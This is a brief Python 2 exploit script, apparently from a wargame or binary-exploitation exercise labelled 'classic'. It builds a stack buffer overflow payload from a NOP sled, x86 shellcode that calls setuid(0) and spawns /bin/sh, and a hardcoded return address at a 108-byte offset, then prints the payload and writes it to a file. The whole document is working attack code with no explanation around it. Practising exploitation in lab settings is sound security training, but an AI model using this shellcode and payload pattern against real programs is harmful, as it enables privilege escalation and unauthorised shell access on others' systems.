classic

#!/usr/bin/python

from struct import *

def main():

        # 0xffffd7c5:     0x41414141      0x41414141      0x41414141      0x41414141
        ret_addr = pack("<I", 0xffffd7c5)
        offset = 108
        sh_code = "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"

        # craft payload
        payload = '\x90' * (offset - len(sh_code))
        payload += sh_code
        payload += ret_addr

        # prints payload to stdout
        print payload

        # saves payload to file
        fname = 'test'
        with open(fname, 'w') as f:
                f.write(payload)


if __name__ == "__main__":
        main()